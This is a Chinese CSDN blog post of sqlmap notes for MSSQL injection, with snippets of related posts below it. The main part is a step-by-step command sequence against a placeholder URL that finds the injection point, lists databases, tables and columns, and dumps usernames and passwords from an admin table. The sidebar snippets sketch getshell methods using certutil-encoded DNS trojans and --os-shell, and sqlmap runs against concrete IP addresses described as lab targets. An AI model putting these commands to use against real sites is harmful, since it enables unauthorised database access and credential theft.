SQLMAP渗透笔记之MSSQL数据库注入

最新推荐文章于 2024-07-11 22:08:09 发布
最新推荐文章于 2024-07-11 22:08:09 发布
阅读量4.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T780000063/article/details/78900498
版权


   


---------------------------------------------------------------------------------------------


                SQLMAP渗透笔记之MSSQL数据库注入


                                
---------------------------------------------------------------------------------------------


1.判断注入点,获取网站信息


sqlmap.py -u http://www.xx.com/ss.asp?id=123


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123"




2.获取所有数据库


sqlmap.py -u http://www.xx.com/ss.asp?id=123 --dbs


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --dbs




3.获取网站当前所使用的数据库


sqlmap.py -u http://www.xx.com/ss.asp?id=123 --current-db


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --current-db




4.获取数据库中的表名


sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 --tables


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 --tables




5.获取数据表中的字段名
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 --columns


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin --columns


6.获取字段中的内容
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 -C "字段名1,字段名2..." --dump


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin -C "username,psw" --dump
Birdman-one
关注
mssql windows验证实现_Mssql注入一个小tips
weixin_39722921的博客
11-28 200
前言:最近遇到一个点感觉蛮有意思的这里给大家分享下!正题:mssql时间盲注,sa权限,只有dns出网,站库分离,get型注入getshell的思路 :利用DNS马上线(dnscat2等)问题: 如何将dns马写入服务器?利用windows中自带的certutil对dns马进行base64编码:(1) 首先在我们本地对其base64编码certutil -encode dns.exe d...
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3232
学习sqlmap自动注入
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
sql注入之getshell方式
m0_52484587的博客
07-11 1237
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell。
Sqlmap基础(二)之Mysql和Mssql注入
weixin_43822735的博客
11-03 554
Mysql数据库注入 测试注入点:http://bbb.com/view.asp?id=1 sqlmap.py –u “http://aaa.com/view.asp?id=1”测试后发现是mysql数据库。 常用指令:is-dba当前用户是否有权限 dbs 查询所有数据库 current-db 网站当前数据库 users 所有数据库用户 current-user当前数据库用户 第一步:sq...
sqlmap普通注入之mssql注入
边城浪子的博客
09-22 1479
1.判断注入点,获取网站信息 sqlmap.py -u http://www.xx.com/ss.asp?id=123 例: sqlmap.py -u “http://www.xx.com/ss.asp?id=123” 2.获取所有数据库 sqlmap.py -u http://www.xx.com/ss.asp?id=123 –dbs 例: sqlmap.py -u “http:/...
SQL注入SQLmap入门
IT-Blog
01-09 2256
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了 基本参数 is-dba 当前用户权限 dbs 所有数据库 current-db 当前数据库 users 所有用户 current-user 当前用户 --tables ...
网络安全之渗透测试20w字全套笔记
最新发布
08-25
MSSQL MYSQL Oracle PostgreSQL SQLite DB2 SQLMAP XSS CSRF PHP包含下载读取 XML SSRF DNSLOG Xpath注入 SSTI 命令注入 PHPMyAdmin利用 PHP-FPM之RCE PHPstudy后门 IIS写权限 绕过WAF 数据库 命令执行 CmdHijack ...
19、渗透测试笔记_SQLMAP_20191112
__Qian的博客
11-13 684
1、SQLMAP介绍 sqlmap是一个由python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具 可检测数据库:access、mssql、mysql、orcale、postgresql、db2、sqlite等 可进行sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等 其他功能:执行命令、列举用户、检测权限、自动破...
网络渗透笔记
weixin_67832238的博客
04-07 1020
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项 选项1是安装Apach
Sqlmap使用教程【笔记精华整理】
qq122219685的专栏
05-20 374
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
sqlmap-1.3.9最新完整版.zip
09-16
亲爱的朋友,SQLMAP是自动化的SQL注入数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。这是本人从sqlmap上下载来的最新版本sqlmap,没有作任何修改,只是方便各位网友快速下载得到工具(毕竟人家服务器架在国外,下载起来花了我五分钟)
Mssql注入
时光凉春衫薄的博客
02-26 3168
Mssql注入 获取数据库信息 Id=1 and 1=(select @@version) 获取当前数据库名称 Id=1 and 1=(select db_name()) 获取用户数据库名称 And 1 =(select top 1 name from master..sysdatabases where dbid>4) 获取下一个用户数据库 And 1 =(select...
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 4158
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
aspx+mssql注入:Sqlmap
zh的博客
10-16 502
靶场地址:http://61.136.208.14:8001/ 解题准备:Sqlmap 解题思路: 1、使用工具尝试注入 sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" --dbs --batch 2、库名 3、表名 sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews --tables..
sql注入sqlmap
Zf_008的博客
01-21 277
generatorSqlmapCustom逆向工程连接sqlserver
午时已到
03-29 377
使用mybatis的generatorSqlmapCustom逆向工程连接sqlserver数据库: generatorConfig.xml: <jdbcConnection driverClass="com.microsoft.sqlserver.jdbc.SQLServerDriver" connectionURL="jdbc:sqlserver://127.0.0.1;Databa...
sqlmap sql 注入攻击
weixin_33919950的博客
02-17 119
 
sqlmap直连MSSQL数据库
02-22
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库管理系统,包括MSSQL。 要使用SQLMap直连MSSQL数据库,首先需要确保已经安装了Python和SQLMap。然后,按照以下步骤进行操作: 1. 打开命令行终端,并导航到SQLMap的安装目录。 2. 输入以下命令来检测目标网站是否存在SQL注入漏洞: ``` python sqlmap.py -u <目标URL> --dbs ``` 其中,`<目标URL>`是要测试的网站URL。 3. 如果存在SQL注入漏洞,SQLMap将列出可用的数据库。选择要攻击的数据库,并记下其名称。 4. 输入以下命令来获取数据库中的表: ``` python sqlmap.py -u <目标URL> -D <数据库名称> --tables ``` 其中,`<数据库名称>`是上一步选择的数据库名称。 5. 选择要攻击的表,并记下其名称。 6. 输入以下命令来获取表中的列: ``` python sqlmap.py -u <目标URL> -D <数据库名称> -T <表名称> --columns ``` 其中,`<表名称>`是上一步选择的表名称。 7. 选择要攻击的列,并记下其名称。 8. 输入以下命令来获取列中的数据: ``` python sqlmap.py -u <目标URL> -D <数据库名称> -T <表名称> -C "<列名称1>,<列名称2>,..." --dump ``` 其中,`<列名称1>,<列名称2>,...`是上一步选择的列名称,用逗号分隔。 9. SQLMap将尝试提取并显示列中的数据。 请注意,使用SQLMap进行SQL注入测试可能涉及到非法活动,应该仅在合法授权的范围内使用。此外,使用SQLMap进行攻击可能会对目标系统造成损害,应谨慎操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值